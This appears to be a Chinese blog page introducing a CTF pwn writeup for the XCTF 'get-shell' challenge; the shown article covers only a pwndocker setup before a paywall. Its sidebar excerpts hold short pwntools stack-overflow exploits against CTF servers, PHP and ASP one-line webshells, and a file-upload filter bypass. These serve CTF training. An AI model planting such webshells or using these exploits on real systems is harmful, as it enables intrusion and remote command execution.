get-shell [XCTF-PWN]CTF writeup系列1

最新推荐文章于 2023-04-01 23:05:44 发布
最新推荐文章于 2023-04-01 23:05:44 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: XCTF-PWN CTF 文章标签: ctf xctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103614336
版权

因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。

今天做的ctf题目是pwn新手训练场的第一题get-shell。

首先我们点击获取在线场景

然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口

我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么反馈了。

我们先下载附件,看看附件是什么情况先

这里先说下我的配置环境:

操作系统是Mac OSX,我安装了docker

然后在docker上面部署了skysider/pwndocker,基本上所有需要的工具在这个docker上都已经安装好了。

 先把docker启动起来

mac126deMacBook-Air:pwn oyf$ sh ./startpwn.sh 
4d80cc020b4cb2cd8562055f39ec6e269196531acfa4466516c1329476371312
mac126deMacBook-Air:pwn oyf$ cat startpwn.sh 
#!/bin/bash

docker run -d --rm -h mypwn --name mypwn -v $(pwd):/ctf/work -p 23946:23946 --cap-add=SYS_PTRACE skysider/pwndocker

mac126deMacBook-Air:pwn oyf$ docker exec -it mypwn /bin/bash
root@mypwn:/ctf/work#

我们在docker里面下载题目的附件

最低0.47元/天 解锁文章
3riC5r
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3705
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
攻防世界pwn新手练习(get_shell
BurYiA的博客
09-15 6858
get_shell pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头) IDA Pro IDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。 pwntools pwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开...
bugku ctf 求getshell
qq_42777804的博客
08-02 481
打开之后 是 文件上传 但是不可以上传 php文件 说明存在过滤 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如mulTipart/form-data (其中t为大写) 所上传的文...
[BUUCTF]PWN——wustctf2020_getshell
BangSen1的博客
03-30 268
wustctf2020_getshell 例行检查 ,开启NX保护,32位, 运行一下,打印出一个图形。 用IDA打开。看到了关键函数。 shelladdr=0x804851B 查看主函数,buf的长度为0x18,读取的长度为0x20,可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',28128) shelladdr=0x804851B payload='a'*(0x18+4)+p32(shelladdr) r.sendline(payl
[BUUCTF-pwn]——wustctf2020_getshell
Y_peak的博客
03-16 168
[BUUCTF-pwn]——wustctf2020_getshell 额,太简单了直接上exploit吧 直接利用栈溢出,修改返回地址就好 from pwn import * p = remote('node3.buuoj.cn',28241) payload = 'a' * (0x18+4) + p32(0x0804851B) p.send(payload) p.interactive()
XCTF-RE】新手练习区-getit
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/aba4sn
XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
python获取交互式ssh shell的方法
09-19
今天小编就为大家分享一篇python获取交互式ssh shell的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1161
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
xctf pwn1
qq_41071646的博客
05-14 955
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
pwn1(xctf)
weixin_43868725的博客
08-08 485
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
Bugku:web 求getshell
qq_26961571的博客
09-09 995
打开这道题,getshell表示的是get shellshell则为脚本的意思。 ​ 打开链接。 发现是一个网页可以上传文件,那么就是文件上传漏洞。 源代码也是不出所料的没有任何东西。 看来是真的要上传一个文件了,试了一下上传一个jpg格式文件,成功!!不过没有用啊,什么东西都没有显示出来。 查了一下资料: webshell就是以php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或...
BugkuCTF之web题之求getshell
A_dmin的博客
12-09 3022
BugkuCTF之web题之求getshell 一进来发现: maybe时绕过,那就用一句话木马吧!! php的一句话是:<?php @eval($_POST['pass']);?> asp的一句话是:<%eval request ("pass")%> aspx的一句话是:<%@ Page Language="Jscript&amp
初识 pwn(get_shell、hello_pwn
最新发布
Welcome To Myon'Blog !
04-01 1035
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写、pwntools、NX、IDA pro
攻防世界XCTF新手区pwn
weixin_45948183的博客
03-24 673
0x00get_shell 第一个比较简单,直接看IDA里面的源码,da进入main函数查看,有system和bin/sh 直接nc连接就可以拿到flag 0x01CGfsb 先看一下保护机制 IDA里面看一下 可以看出当pwnme=8,就可以拿到flag,然后怎么使pwnme=8呢? 可以看出printf哪里存在格式化字符漏洞,由于printf()函数使用不当,造成任意内存读写,通常使用%...
[XCTF-pwn] 1-Mary_Morton
weixin_52640415的博客
03-03 155
太简的没意思,可以怕忘了到哪了,索性把exp按顺序存上。 这个题是个格式化字符串的题,没开pie,程序里有system。 直接把printf改为system就行了 from pwn import * local = 0 if local == 1: p = process('./pwn') else: p = remote('111.200.241.244', 49641) elf = ELF('./pwn') context(arch='amd64', log_level='d
实战环境下的网络空间安全教育:GMIC-XCTF京津冀邀请赛与人才培养
"GMIC-XCTF京津冀邀请赛是一场聚焦网络空间安全的竞赛,旨在通过实战环境锤炼网络空间安全人才,推动该领域的人才培养。比赛中,北京航空航天大学的Lancet战队脱颖而出,获得了冠军。本次赛事体现了网络安全教育的新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值